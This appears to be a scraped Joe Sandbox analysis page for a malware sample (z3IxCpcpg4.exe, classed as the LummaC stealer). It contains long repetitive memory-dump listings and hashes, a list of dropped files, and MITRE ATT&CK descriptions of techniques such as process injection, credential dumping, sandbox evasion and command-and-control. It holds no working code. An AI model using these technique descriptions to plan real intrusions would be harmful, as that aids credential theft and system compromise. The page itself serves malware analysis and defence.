Associated: 00000000.00000002.2571311166.0000000005F90000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ce0000_z3IxCpcpg4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c69bb09953da924e3b976a327497c8088135576d487106c03a8032e9c1fbf6b9
Instruction ID: 363a2471ac7780e2436f7dbb65495259a00c5b025d44aafb8e3af55e615a04b7
Opcode Fuzzy Hash: c69bb09953da924e3b976a327497c8088135576d487106c03a8032e9c1fbf6b9
Instruction Fuzzy Hash: 76E04676008105AAD7009F64D84599FFBF8FF1A321F649849E898CB222C3368842CB2A

Function 00F0C805 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89c84b94e79b4e47aef7dec0dda070f6c1a0b1c7a001cec78c57de336d020492
Instruction ID: a6302c7ee26001c5f9460893dd7cdc77a731a34b5dda3fdb0b1c88e26a12cfbf
Opcode Fuzzy Hash: 89c84b94e79b4e47aef7dec0dda070f6c1a0b1c7a001cec78c57de336d020492
Instruction Fuzzy Hash: ABC0123C543448DF82045F20DC08479B374AB1B502B006404DC17D3212CB21E605BA6D

Function 00F237D6 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b781685a8c31397642a0bb7d73af5ab116f76d694fe24c9895b12cc1a165d30a
Instruction ID: 41ecf8f0a024a7d85b02f26de482594344712da863e5400fab49628a8d595c11
Opcode Fuzzy Hash: b781685a8c31397642a0bb7d73af5ab116f76d694fe24c9895b12cc1a165d30a
Instruction Fuzzy Hash: B8B092B4A1C2018A87088F00E140039BAB462AF201F30601D908AA3211D229C104AA89

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report z3IxCpcpg4.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Phishing

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Chrome Cache Entry: 100

Chrome Cache Entry: 101

Chrome Cache Entry: 102

Chrome Cache Entry: 103

Chrome Cache Entry: 104

Windows Analysis Report
z3IxCpcpg4.exe

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre